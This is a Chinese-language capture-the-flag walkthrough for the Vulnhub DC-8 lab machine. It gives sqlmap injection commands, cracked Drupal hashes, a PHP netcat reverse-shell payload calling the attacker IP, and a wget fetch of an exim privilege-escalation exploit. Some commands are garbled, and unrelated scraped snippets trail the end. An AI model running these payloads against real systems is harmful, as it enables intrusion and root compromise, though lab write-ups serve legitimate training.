Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。
vulnhub官网:https://www.vulnhub.com
下载地址:https://download.vulnhub.com/dc/DC-8.zip
1、直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本的);
2、解压会得到一个.ova的文件,然后在VMware中打开即可;
攻击机kali:172.20.10.3
DC靶机:192.168.2.25
(我两者都是用的桥接模式,更好都再做一个快照吧,以防万一)
虚拟机打开如下所示:
1、老样子三板斧,上nmap进行主机探测
扫描到靶机开放了22和80端口,使用的是Drupal(版本是7.x)的cms,还有一个robots协议。
2、既然扫描到了80端口,那就直接访问一下
3、目录扫描(我使用的是dirsearch工具),扫描到一个登录界面。
4、尝试爆破了一下,没成功,可能是自己的字典太lj了,只有尝试其他的方式了。
1、后来点击De'tails导航栏的模块,发现url里面带有参数,果断尝试一下sql注入。没想到也确实存在sql注入,真实得来全不费工夫呀!
2、既然存在sql注入,那就得掏出sqlmap这个大杀器了
python2 sqlmap.py -u http://172.20.10.7/?nid=1%27
3、爆库名:d7db
python2 sqlmap.py -u http://172.20.10.7/?nid=1%27 --current-db
4、爆表,一共爆出来有八十多张表,但是我是需要登录用户名密码,所以就查看了users这张表
python2 sqlmap.py -u http://172.20.10.7/?nid=1%27 -D d7db --tables
5、爆列名,爆出来其中有16列
python2 sqlmap.py -u http://172.20.10.7/?nid=1%27 -D d7db -T users --columns
6、读取数据,既然我们找到了登录页面,那就只需要账户名和密码,所以读取账户名和密码,即name和pass这两列。
得到用户名admin和john,密码经过加密,需要解密。
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9 *** qJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
密码密文得到了,但是却不知道怎么破解呀!john这个用户名看起来似乎有点眼熟, *** ,john不是一个密码破解的工具吗?那就应该是要用john工具来爆破密码了。
1、将得到的账户名和密码放到文本文件中
2、然后开始使用john爆破密码
john dc8.txt
得到john用户的密码为:turtle
admin用户的密码破解不出来!!!
1、使用得到的账户名和密码登录
2、发现Contact Us 页面可以修改,所以可以直接写入一个shell,然后将其反弹到攻击机。
3、写入shell
<?php system("nc -e /bin/sh 172.20.10.3? 1234"); ?>
4、然后回到view页面,填写一些东西提交,同时在攻击机上开始监听
5、成功得到shell
1、老规矩,返回一个稳定的交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
2、使用命令查看是否有suid的提权的命令
find / -user root -perm -4000 -print 2>/dev/null
3、找到一个exim4的命令,查看其版本
/usr/ *** in/exim4 --version
4、使用searchsploit来寻找版本漏洞
searchsploit exim 4
5、将脚本复制到本地,命令为shell.sh
或者也可以在此链接直接下载该exp:https://www.exploit-db.com/exploits/46996
cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh
6、然后将脚本下载到到靶机中
可以将脚本放到攻击机的apache目录下,然后再使用获得的靶机的shell下载
mv shell.sh /var/www/html #移动脚本到目录/var/www/html下
service apache2 start #启动apache服务
7、在靶机中下载脚本,只能在靶机的tmp目录下下载,因为/tmp目录的权限大。
wget http://172.20.10.3/shell.sh
8、赋予脚本权限,然后执行脚本
chmod 777 shell.sh #赋予脚本权限
https://www.freebuf.com/articles/web/shell.sh -m netcat #执行脚本
9、失败了
原因是:shell.sh文件的格式为dos格式。linux只能执行格式为unix格式的脚本。
使用set ff=unix : 告诉 vim 编辑器,使用unix换行符,不然会无法执行脚本。
所以修改一下攻击机目录下的shell脚本,在脚本最后加上 :set ff=unix
然后在靶机中重新下载脚本,赋予权限,执行脚本,提权成功,得到最终的flag!!!
1、nmap的使用
2、sql注入,常用的sqlmap指令
3、john破解密码
4、exim的版本漏洞
本文导读目录: 1、一本穿越小说,男主角是电脑高手被自己师父害死了 重生在自己的大学时代了 2、前世职业黑客重生后当起了大学老师是那部小说 3、求百万字以上黑客小说,不要系统流,不要系统流,不...
新建一个文本文件,更改扩展名为aabb.udl双击此文件,选数据库类型、设置ip、用户名、密码,数据库可进行连接测试,当然对方要开sql服务的测试成功后,点。 渗透测试流程前渗透阶段信息搜集、漏洞扫描...
去一些大型黑客网站就可以学的到的黑客基地华夏黑客同盟之类的 找个高手用同样的方式问候他妈妈 你把杀毒软件关闭,防火墙卸载了,漏洞补丁删除掉他们就会来找你了 有这么容易让你找到的话还得了啊,给你知道就不...
各人都清楚今后的时代将会是属于年青人的时代,而餐饮行业的消费者的年数段也是都方向年青的,那么此刻的餐饮行业就要思考此刻如何去满意年青人的需求,年青人的消费程度是不行限量的,而颠末观测发来岁轻人们喜欢的...
本文目录一览: 1、电脑的360浏览器怎样防止黑客入侵 2、什么是Hack技术? 3、我用360安全浏览器,有五次左右了说是黑客攻击被拦截,真的有黑客攻击我吗,上次我用了远程协助,有关吗...
微博推广是以微博作为推广平台,每一个听众(粉丝)都是潜在营销对象,每个企业利用更新自己的微型博客向网友传播企业、产品的信息,树立着良好的企业形象和产品形象。每天的更新的内容就可以跟大家交流,或者有大家...